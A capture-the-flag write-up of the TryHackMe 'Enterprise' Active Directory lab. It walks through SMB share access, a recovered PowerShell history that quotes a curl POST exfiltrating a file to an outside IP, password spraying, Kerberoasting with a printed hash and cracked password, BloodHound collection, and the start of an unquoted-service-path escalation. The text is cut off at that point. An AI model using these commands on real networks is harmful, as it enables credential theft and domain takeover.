> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/tryhackme-oscp-machines/thm-enterprise.md).

# THM - Enterprise

## Enumeration and Foothold

### NMAP

```bash
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-02-16 05:51:05Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: LAB-ENTERPRISE
|   NetBIOS_Domain_Name: LAB-ENTERPRISE
|   NetBIOS_Computer_Name: LAB-DC
|   DNS_Domain_Name: LAB.ENTERPRISE.THM
|   DNS_Computer_Name: LAB-DC.LAB.ENTERPRISE.THM
|   DNS_Tree_Name: ENTERPRISE.THM
|   Product_Version: 10.0.17763
|_  System_Time: 2026-02-16T05:53:20+00:00
| ssl-cert: Subject: commonName=LAB-DC.LAB.ENTERPRISE.THM
| Issuer: commonName=LAB-DC.LAB.ENTERPRISE.THM
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-02-15T05:49:34
| Not valid after:  2026-08-17T05:49:34
| MD5:   7fa0 4df1 2f0e 02eb 01d1 1aa9 06f8 945c
|_SHA-1: e7af e8ba 907a 3714 b3ec 4c82 6ea0 9afb a7a2 bb5d
|_ssl-date: 2026-02-16T05:53:35+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :

```

Add the following to /etc/hosts

```bash
LAB-DC.LAB.ENTERPRISE.THM
LAB.ENTERPRISE.THM
ENTERPRISE.THM
```

### SMB

```bash
root@ip-10-82-113-73:~# smbclient -L \\\\10.82.168.66\\
Password for [WORKGROUP\root]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	Docs            Disk      
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
	Users           Disk      Users Share. Do Not Touch!
SMB1 disabled -- no workgroup available
root@ip-10-82-113-73:~# 

```

Anonymous login allowed.

```bash
root@ip-10-82-113-73:~# smbclient  \\\\10.82.168.66\\Docs
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Mar 15 02:47:35 2021
  ..                                  D        0  Mon Mar 15 02:47:35 2021
  RSA-Secured-Credentials.xlsx        A    15360  Mon Mar 15 02:46:54 2021
  RSA-Secured-Document-PII.docx       A    18432  Mon Mar 15 02:45:24 2021

		15587583 blocks of size 4096. 9905520 blocks available

smb: \> mget *
Get file RSA-Secured-Credentials.xlsx? y
getting file \RSA-Secured-Credentials.xlsx of size 15360 as RSA-Secured-Credentials.xlsx (483.9 KiloBytes/sec) (average 483.9 KiloBytes/sec)
Get file RSA-Secured-Document-PII.docx? y
getting file \RSA-Secured-Document-PII.docx of size 18432 as RSA-Secured-Document-PII.docx (782.6 KiloBytes/sec) (average 611.1 KiloBytes/sec)
smb: \> 

```

```bash
─(ajay㉿kali)-[~]
└─$ smbclient  \\\\10.81.172.3\\Users 
Password for [WORKGROUP\ajay]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Thu Mar 11 21:11:49 2021
  ..                                 DR        0  Thu Mar 11 21:11:49 2021
  Administrator                       D        0  Thu Mar 11 16:55:48 2021
  All Users                       DHSrn        0  Sat Sep 15 03:28:48 2018
  atlbitbucket                        D        0  Thu Mar 11 17:53:06 2021
  bitbucket                           D        0  Thu Mar 11 21:11:51 2021
  Default                           DHR        0  Thu Mar 11 19:18:03 2021
  Default User                    DHSrn        0  Sat Sep 15 03:28:48 2018
  desktop.ini                       AHS      174  Sat Sep 15 03:16:48 2018
  LAB-ADMIN                           D        0  Thu Mar 11 19:28:14 2021
  Public                             DR        0  Thu Mar 11 16:27:02 2021

                15587583 blocks of size 4096. 9900076 blocks available
```

So i mounted the share locally to find the data init.

#### Mounting SMB Shares&#x20;

```bash
──(ajay㉿kali)-[~]
└─$ sudo mkdir /mnt/smbshare 

┌──(ajay㉿kali)-[~]
└─$ sudo mount -t cifs //10.81.172.3/Users /mnt/smbshare                           
Password for root@//10.81.172.3/Users: 
```

```bash
jay㉿kali)-[/mnt/smbshare]
└─$ ls
 Administrator  'All Users'   atlbitbucket   bitbucket   Default  'Default User'   desktop.ini   LAB-ADMIN   Public

```

Found a PowerShell history file in the below directory.

```bash
┌──(ajay㉿kali)-[/mnt/…/Microsoft/WIndows/Powershell/PSReadline]
└─$ ls
Consolehost_hisory.txt

┌──(ajay㉿kali)-[/mnt/…/Microsoft/WIndows/Powershell/PSReadline]
└─$ cat Consolehost_hisory.txt 
cd C:\
mkdir monkey
cd monkey
cd ..
cd ..
cd ..
cd D:
cd D:
cd D:
D:\
mkdir temp
cd temp
echo "replication:101RepAdmin123!!">private.txt
Invoke-WebRequest -Uri <http://1.215.10.99/payment-details.txt>
more payment-details.txt
curl -X POST -H 'Cotent-Type: ascii/text' -d .\private.txt' <http://1.215.10.99/dropper.php?file=itsdone.txt>
del private.txt
del payment-details.txt
cd ..
del temp
cd C:\
C:\
exit              
```

Found credentials

**replication:101RepAdmin123!!**

The credentials didnt work.

```bash
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.81.172.3 -u replication -p '101RepAdmin123!!' 
SMB         10.81.172.3     445    LAB-DC           [*] Windows 10 / Server 2019 Build 17763 x64 (name:LAB-DC) (domain:LAB.ENTERPRISE.THM) (signing:True) (SMBv1:False) 
SMB         10.81.172.3     445    LAB-DC           [-] LAB.ENTERPRISE.THM\replication:101RepAdmin123!! STATUS_LOGON_FAILURE 
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ nxc ldap 10.81.172.3 -u replication -p '101RepAdmin123!!'
LDAP        10.81.172.3     389    LAB-DC           [*] Windows 10 / Server 2019 Build 17763 (name:LAB-DC) (domain:LAB.ENTERPRISE.THM)
LDAP        10.81.172.3     389    LAB-DC           [-] LAB.ENTERPRISE.THM\replication:101RepAdmin123!! 
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ nxc rdp 10.81.172.3 -u replication -p '101RepAdmin123!!'
RDP         10.81.172.3     3389   LAB-DC           [*] Windows 10 or Windows Server 2016 Build 17763 (name:LAB-DC) (domain:LAB.ENTERPRISE.THM) (nla:False)
RDP         10.81.172.3     3389   LAB-DC           [-] LAB.ENTERPRISE.THM\replication:101RepAdmin123!! (STATUS_LOGON_FAILURE)

```

Then got an idea that may be the folders we found the users share can be the users on the windows lets enumerate them.

```bash
Administrator
altbitbucket
bitbucket
Default
LAB-ADMIN
Public
```

```bash
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.81.172.3 -u users.txt -p '101RepAdmin123!!' --continue-on-success
SMB         10.81.172.3     445    LAB-DC           [*] Windows 10 / Server 2019 Build 17763 x64 (name:LAB-DC) (domain:LAB.ENTERPRISE.THM) (signing:True) (SMBv1:False) 
SMB         10.81.172.3     445    LAB-DC           [+] LAB.ENTERPRISE.THM\users.txt:101RepAdmin123!! (Guest)

```

```bash
──(ajay㉿kali)-[~/Tools]
└─$ ./kerbrute_linux_amd64 userenum -d LAB.ENTERPRISE.THM --dc 10.81.172.3 ~/Users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 02/16/26 - Ronnie Flathers @ropnop

2026/02/16 13:23:42 >  Using KDC(s):
2026/02/16 13:23:42 >   10.81.172.3:88

2026/02/16 13:23:42 >  [+] VALID USERNAME:       bitbucket@LAB.ENTERPRISE.THM
2026/02/16 13:23:42 >  [+] VALID USERNAME:       replication@LAB.ENTERPRISE.THM
2026/02/16 13:23:42 >  [+] VALID USERNAME:       atlbitbucket@LAB.ENTERPRISE.THM
2026/02/16 13:23:42 >  [+] VALID USERNAME:       Administrator@LAB.ENTERPRISE.THM
2026/02/16 13:23:42 >  Done! Tested 7 usernames (4 valid) in 0.197 seconds

```

```bash
──(ajay㉿kali)-[~]
└─$ nxc smb 10.81.172.3 -u Users.txt -p '101RepAdmin123!!' --continue-on-success
SMB         10.81.172.3     445    LAB-DC           [*] Windows 10 / Server 2019 Build 17763 x64 (name:LAB-DC) (domain:LAB.ENTERPRISE.THM) (signing:True) (SMBv1:False) 
SMB         10.81.172.3     445    LAB-DC           [-] LAB.ENTERPRISE.THM\Administrator:101RepAdmin123!! STATUS_LOGON_FAILURE 
SMB         10.81.172.3     445    LAB-DC           [-] LAB.ENTERPRISE.THM\atlbitbucket:101RepAdmin123!! STATUS_LOGON_FAILURE 
SMB         10.81.172.3     445    LAB-DC           [-] LAB.ENTERPRISE.THM\bitbucket:101RepAdmin123!! STATUS_LOGON_FAILURE 
SMB         10.81.172.3     445    LAB-DC           [+] LAB.ENTERPRISE.THM\Default:101RepAdmin123!! (Guest)
SMB         10.81.172.3     445    LAB-DC           [+] LAB.ENTERPRISE.THM\LAB-ADMIN:101RepAdmin123!! (Guest)
SMB         10.81.172.3     445    LAB-DC           [+] LAB.ENTERPRISE.THM\Public:101RepAdmin123!! (Guest)
SMB         10.81.172.3     445    LAB-DC           [-] LAB.ENTERPRISE.THM\replication:101RepAdmin123!! STATUS_LOGON_FAILURE 

```

### HTTP - 7990

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FVqhCDYAAIqfODgpizDtr%2Fimage.png?alt=media&amp;token=6f39d3ec-e541-410f-8bea-62c88a807dcf" alt=""><figcaption></figcaption></figure>

Says they are moving to github lets do a OSNIT on the domain.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FK3WM12kCPhMVWKWCQRWQ%2Fimage.png?alt=media&amp;token=667a4af0-1a79-46b7-8180-517e297b9b2b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fngjn5d7kiowrqlIiy0mX%2Fimage.png?alt=media&amp;token=0e43906c-57c0-4440-bfe4-3150a863df1b" alt=""><figcaption></figcaption></figure>

Theres a developer details in the People section.

![](https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FtY1uGzJr5orlY5VTmCi4%2Fimage.png?alt=media\&token=a1ac872f-9c38-4ddf-b844-7673a5adb33a)

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FUxyeSQyjatMr55Z9JFYd%2Fimage.png?alt=media&amp;token=dbd0af5c-2250-4421-80f3-47b2bb57ca36" alt=""><figcaption></figcaption></figure>

The script contains blank user and password. Lets check the history.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FnNaMm9OrBi780wMISTUR%2Fimage.png?alt=media&amp;token=ae25bb68-b36e-4cb6-b646-256e68b1b99b" alt=""><figcaption></figcaption></figure>

```bash
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.81.172.3 -u nik -p 'ToastyBoi!'           
SMB         10.81.172.3     445    LAB-DC           [*] Windows 10 / Server 2019 Build 17763 x64 (name:LAB-DC) (domain:LAB.ENTERPRISE.THM) (signing:True) (SMBv1:False) 
SMB         10.81.172.3     445    LAB-DC           [+] LAB.ENTERPRISE.THM\nik:ToastyBoi! 
```

We can rdp to the user.

```bash
──(ajay㉿kali)-[~]
└─$ nxc rdp 10.81.172.3 -u nik -p 'ToastyBoi!' 
RDP         10.81.172.3     3389   LAB-DC           [*] Windows 10 or Windows Server 2016 Build 17763 (name:LAB-DC) (domain:LAB.ENTERPRISE.THM) (nla:False)
RDP         10.81.172.3     3389   LAB-DC           [+] LAB.ENTERPRISE.THM\nik:ToastyBoi! 

```

Lets use the nik credentials to enumerate the password policy todo extract further

```bash
─(ajay㉿kali)-[~]
└─$ nxc smb 10.81.172.3 -u nik -p 'ToastyBoi!' --users --pass-pol
SMB         10.81.172.3     445    LAB-DC           [*] Windows 10 / Server 2019 Build 17763 x64 (name:LAB-DC) (domain:LAB.ENTERPRISE.THM) (signing:True) (SMBv1:False) 
SMB         10.81.172.3     445    LAB-DC           [+] LAB.ENTERPRISE.THM\nik:ToastyBoi! 
SMB         10.81.172.3     445    LAB-DC           -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.81.172.3     445    LAB-DC           Administrator                 2021-03-11 21:23:37 0       Built-in account for administering the computer/domain 
SMB         10.81.172.3     445    LAB-DC           Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         10.81.172.3     445    LAB-DC           krbtgt                        2021-03-12 00:31:21 0       Key Distribution Center Service Account 
SMB         10.81.172.3     445    LAB-DC           atlbitbucket                  2021-03-11 22:52:53 0        
SMB         10.81.172.3     445    LAB-DC           bitbucket                     2021-03-12 01:20:01 0        
SMB         10.81.172.3     445    LAB-DC           nik                           2021-03-12 01:33:25 0        
SMB         10.81.172.3     445    LAB-DC           replication                   2021-03-12 03:01:41 0        
SMB         10.81.172.3     445    LAB-DC           spooks                        2021-03-12 03:35:24 0        
SMB         10.81.172.3     445    LAB-DC           korone                        2021-03-12 03:36:10 0        
SMB         10.81.172.3     445    LAB-DC           banana                        2021-03-12 03:37:11 0        
SMB         10.81.172.3     445    LAB-DC           Cake                          2021-03-12 03:39:42 0        
SMB         10.81.172.3     445    LAB-DC           contractor-temp               2021-03-12 03:44:27 0       Change password from Password123! 
SMB         10.81.172.3     445    LAB-DC           varg                          2021-03-12 03:45:57 0        
SMB         10.81.172.3     445    LAB-DC           joiner                        2021-03-15 01:15:38 0        
SMB         10.81.172.3     445    LAB-DC           [*] Enumerated 14 local users: LAB-ENTERPRISE
SMB         10.81.172.3     445    LAB-DC           [+] Dumping password info for domain: LAB-ENTERPRISE
SMB         10.81.172.3     445    LAB-DC           Minimum password length: 7
SMB         10.81.172.3     445    LAB-DC           Password history length: 24
SMB         10.81.172.3     445    LAB-DC           Maximum password age: 41 days 23 hours 53 minutes 
SMB         10.81.172.3     445    LAB-DC           
SMB         10.81.172.3     445    LAB-DC           Password Complexity Flags: 000000
SMB         10.81.172.3     445    LAB-DC               Domain Refuse Password Change: 0
SMB         10.81.172.3     445    LAB-DC               Domain Password Store Cleartext: 0
SMB         10.81.172.3     445    LAB-DC               Domain Password Lockout Admins: 0
SMB         10.81.172.3     445    LAB-DC               Domain Password No Clear Change: 0
SMB         10.81.172.3     445    LAB-DC               Domain Password No Anon Change: 0
SMB         10.81.172.3     445    LAB-DC               Domain Password Complex: 0
SMB         10.81.172.3     445    LAB-DC           
SMB         10.81.172.3     445    LAB-DC           Minimum password age: 1 day 4 minutes 
SMB         10.81.172.3     445    LAB-DC           Reset Account Lockout Counter: 30 minutes 
SMB         10.81.172.3     445    LAB-DC           Locked Account Duration: 30 minutes 
SMB         10.81.172.3     445    LAB-DC           Account Lockout Threshold: None
SMB         10.81.172.3     445    LAB-DC           Forced Log off Time: Not Set

```

Found password for Contractor-temp : Password123!

tried password spraying using the pass aganist domain users but no use.

```bash
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.81.172.3 -u domuser.txt -p 'Password123!' --continue-on-success
SMB         10.81.172.3     445    LAB-DC           [*] Windows 10 / Server 2019 Build 17763 x64 (name:LAB-DC) (domain:LAB.ENTERPRISE.THM) (signing:True) (SMBv1:False) 
SMB         10.81.172.3     445    LAB-DC           [-] LAB.ENTERPRISE.THM\Administrator:Password123! STATUS_LOGON_FAILURE 
SMB         10.81.172.3     445    LAB-DC           [-] LAB.ENTERPRISE.THM\Guest:Password123! STATUS_LOGON_FAILURE 
SMB         10.81.172.3     445    LAB-DC           [-] LAB.ENTERPRISE.THM\krbtgt:Password123! STATUS_LOGON_FAILURE 
SMB         10.81.172.3     445    LAB-DC           [-] LAB.ENTERPRISE.THM\atlbitbucket:Password123! STATUS_LOGON_FAILURE 
SMB         10.81.172.3     445    LAB-DC           [-] LAB.ENTERPRISE.THM\nik:Password123! STATUS_LOGON_FAILURE 
SMB         10.81.172.3     445    LAB-DC           [-] LAB.ENTERPRISE.THM\replication:Password123! STATUS_LOGON_FAILURE 
SMB         10.81.172.3     445    LAB-DC           [-] LAB.ENTERPRISE.THM\spooks:Password123! STATUS_LOGON_FAILURE 
SMB         10.81.172.3     445    LAB-DC           [-] LAB.ENTERPRISE.THM\korone:Password123! STATUS_LOGON_FAILURE 
SMB         10.81.172.3     445    LAB-DC           [-] LAB.ENTERPRISE.THM\banana:Password123! STATUS_LOGON_FAILURE 
SMB         10.81.172.3     445    LAB-DC           [-] LAB.ENTERPRISE.THM\Cake:Password123! STATUS_LOGON_FAILURE 
SMB         10.81.172.3     445    LAB-DC           [+] LAB.ENTERPRISE.THM\contractor-temp:Password123! 
SMB         10.81.172.3     445    LAB-DC           [-] LAB.ENTERPRISE.THM\varg:Password123! STATUS_LOGON_FAILURE 
SMB         10.81.172.3     445    LAB-DC           [-] LAB.ENTERPRISE.THM\joiner:Password123! STATUS_LOGON_FAILURE 
                                                                                                                       
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FKMe2MoaoYBk6sQwuqoe0%2Fimage.png?alt=media&amp;token=67e5f37f-b72f-4e2e-93f5-db5473420ab1" alt=""><figcaption></figcaption></figure>

Below users are domain admins.

```bash
(ajay㉿kali)-[~]
└─$ impacket-GetUserSPNs Lab.ENTERPRISE.THM/nik:'ToastyBoi!' -dc-ip 10.81.172.3 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name       MemberOf                                                     PasswordLastSet             LastLogon                   Delegation 
--------------------  ---------  -----------------------------------------------------------  --------------------------  --------------------------  ----------
HTTP/LAB-DC           bitbucket  CN=sensitive-account,CN=Builtin,DC=LAB,DC=ENTERPRISE,DC=THM  2021-03-11 20:20:01.333272  2021-04-26 11:16:41.570158             

[-] CCache file is not found. Skipping...
$krb5tgs$23$*bitbucket$LAB.ENTERPRISE.THM$Lab.ENTERPRISE.THM/bitbucket*$c57d8034a9ff43cf74fbaee5b4fb5969$5e63a4d57002b9ff8d232480b307fd562241c4d70b322c036ef774d7e3ea91a5066ad1c4378f22fb21f0fe7725a22e3c2257ffb7976386c7f863c81bcd00d0c94f32e87b78e227da4293cd7a46cf91f3b357dabdbbec12344aa2f3227c891b028f845e3ff9253dd42dfc9bd42ea2ac4afcf2f033c780b3134fe16f6f32acd34e97c32f9a80f6e7b371bc4c1f1540b2042d80d6126a79584d96394b99e3561ba78cca4b5cf34de6621df0aed9beda2c1f767abed18f7b4a78457c689847f934c90f172c26392e61a06956bd905495f5e670a282686d3fe197b5d6ee3cfa2c650a49ff9f5302283d7f8358f3bf30789858f9c0192c89534927a51aa5ac76ab1170a87d12c8834c22743532d350e70bf5dc8160f4614fea4f2834d4f22f7fa0a00d87264d4d9dbb26371d4054742f68a2885cea77886cdd67a8bc4cf88468f515787e304293c2378959c577bd93c323ab001580b1817ecc9402195df7c1f7b1ce63dbf855768cc7a0e4762fedb0431e726b89a5acf82a7a85e768768ca52ed8393d41147011a3df8f31d92cdfefcf16e1c8aa8693e2b6c29625dea307479328df30a7518a4c91f20566426f174d029ea4bf389f046fe07876762b653d325ebeae72a860f9e49386cbff95303fb94248a2aee0d6a46729d419a1589b6537d7352fde4e114501717032e45548193c587989bb828eedce226c729ace4deaa5a6f85a6a67b82383d8a3847d56cdfdf60c843f450e50bf6dacafd343c8ca43ee7a449d5f64f01d97d501ae758ef71c8802dd7f1769bbf9254f8fcd32b0a4aa67e2e1b864fb6486e3f4376aa44c451a15284ee23617948a3eb1d7a1d4f64e342bf659a10bb32b3fd99d764fd8cfad42da58e4d3b455692f84e6d9fd322de0c1e4b9b841d9121a4b18b3fdf52aae90f10bcf43e08f2a336f683628ccc8bea9de1594a12ea135e3343508a65224d9cf1fec578a2f0f2318bb6f44e5d4f04b6bb2ccec67886f116e6df460e536ab86b81965a07be4e19b600b3723f6dbebc236c3d320988fb67c61078c224aeb64e0e3fabd8cc05967913ec0e2556b259cbf36948f5a0b9f9f1ce74756d8a8bff9ec10814d78ad8dd76a708cd45d9c10848914e692b42a3a98ca069e463e48a95a2ced690495bcd69a9d755c69a772084ebc426161a2b816350460e818f0a5a8982d423a5d1941e11152e79c3445cef30381b7a326d0f826c9e84fec67d153b9783fb7f140bb5d09331f2dec1905ceab4e587fd1e814165622196fa753bf1b38e9407eae005d84b794fed148babdc269d6c31bd272fcab13967004061e41bb9176b028cc11e95844869194beee11612736ac939c97996897744dcb96

```

Cracking the hash using hashcat with mode 13100

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FKJWf55VNbSFkPxhmbHOE%2Fimage.png?alt=media&amp;token=3bd47a00-22a1-4904-b29b-27b7a6ff392d" alt=""><figcaption></figcaption></figure>

```bash
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.81.172.3 -u bitbucket -p littleredbucket 
SMB         10.81.172.3     445    LAB-DC           [*] Windows 10 / Server 2019 Build 17763 x64 (name:LAB-DC) (domain:LAB.ENTERPRISE.THM) (signing:True) (SMBv1:False) 
SMB         10.81.172.3     445    LAB-DC           [+] LAB.ENTERPRISE.THM\bitbucket:littleredbucket 
                                                                                                     
```

```bash
─(ajay㉿kali)-[~/Tools]
└─$ bloodhound-python -u nik -p 'ToastyBoi!' -d Lab.ENTERPRISE.THM -dc LAB-DC.LAB.ENTERPRISE.THM -ns 10.81.172.3 --disable-autogc -c all
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: lab.enterprise.thm
WARNING: Could not find a global catalog server. Please specify one with -gc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: LAB-DC.LAB.ENTERPRISE.THM
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: LAB-DC.LAB.ENTERPRISE.THM
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 15 users
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 51 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 2 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: LAB-DC.LAB.ENTERPRISE.THM
INFO: Done in 00M 21S
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~/Tools]
└─$ ls
20260216135340_computers.json   20260216135340_gpos.json    20260216135340_users.json  LFI-Jhaddix.txt  nim-shell          ports.txt         username-anarchy    XSStrike
20260216135340_containers.json  20260216135340_groups.json  dns-Jhaddix.txt            LFISuite         ntlm_theft         PowerUp.ps1       winPEASx64.exe      XXEinjector
20260216135340_domains.json     20260216135340_ous.json     kerbrute_linux_amd64       linpeas.sh       offensivesecurity  PrivescCheck.ps1  xss-cookie-stealer

```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FOBQYPqc1FLABEvNK4nny%2Fimage.png?alt=media&amp;token=3aa41c01-2c4d-4bab-a68f-f908687ed710" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FreV3rQ43qIRa2KNj9UKN%2Fimage.png?alt=media&amp;token=9bf7b8e7-0a28-4963-bc73-693efa4047f1" alt=""><figcaption></figcaption></figure>

## Session as Bitbucket

```bash
┌──(ajay㉿kali)-[~]
└─$ xfreerdp3 /v:10.81.172.3 /u:bitbucket /p:littleredbucket /dynamic-resolution
[14:34:00:748] [72191:000119ff] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: Using /p is insecure
[14:34:00:748] [72191:000119ff] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: Passing credentials or secrets via command line might expose these in the process list
[14:34:00:748] [72191:000119ff] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: Conside
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FNNa3fvXoktLtRYTcfsle%2Fimage.png?alt=media&amp;token=592f2f48-b4ba-4b03-84c4-505ef2731d67" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvOICGMnLDvUbvGEo50Fq%2Fimage.png?alt=media&amp;token=fee6d36a-5a55-4769-9d56-57952db8e71d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHEC2TDao656e2CjfMcAa%2Fimage.png?alt=media&amp;token=e2213f96-2b5e-4bf1-b0a3-e65b2e436129" alt=""><figcaption></figcaption></figure>

Found an Unquoted paths Service which is vulnerable and rated as high.

In the case of unquoted service paths, the system will check for each word in the current folder. If it doesn’t find that word, then it will include the next word after the space and check for those words, and so on.

### Exploiting Unquoted Service Path

Here it will check C:\Program which it won’t find, so it will move on to check C:\Program Files. This will be done throughout the path. We also have ‘write’ permissions to this path. So, if we add a malicious payload, say Zero.exe in the \Zero Tier folder, then our payload will be the first one to be checked and executed.

Checking write permissions on the directory to write our exploit.

```bash
PS C:\> icacls Program Files
Invalid parameter "Files"
PS C:\> icacls "Program Files"
Program Files NT SERVICE\TrustedInstaller:(F)
              NT SERVICE\TrustedInstaller:(CI)(IO)(F)
              NT AUTHORITY\SYSTEM:(M)
              NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
              BUILTIN\Administrators:(M)
              BUILTIN\Administrators:(OI)(CI)(IO)(F)
              BUILTIN\Users:(RX)
              BUILTIN\Users:(OI)(CI)(IO)(GR,GE)
              CREATOR OWNER:(OI)(CI)(IO)(F)
              APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
              APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)(GR,GE)
              APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(RX)
              APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files

PS C:\> icacls "Program Files (x86)"
Program Files (x86) NT SERVICE\TrustedInstaller:(F)
                    NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                    NT AUTHORITY\SYSTEM:(M)
                    NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                    BUILTIN\Administrators:(M)
                    BUILTIN\Administrators:(OI)(CI)(IO)(F)
                    BUILTIN\Users:(RX)
                    BUILTIN\Users:(OI)(CI)(IO)(GR,GE)
                    CREATOR OWNER:(OI)(CI)(IO)(F)
                    APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
                    APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)(GR,GE)
                    APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(RX)
                    APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(OI)(CI)(IO)(GR,GE)
```

```bash
PS C:\Program Files (x86)> icacls "Zero Tier"
Zero Tier BUILTIN\Users:(OI)(CI)(W)
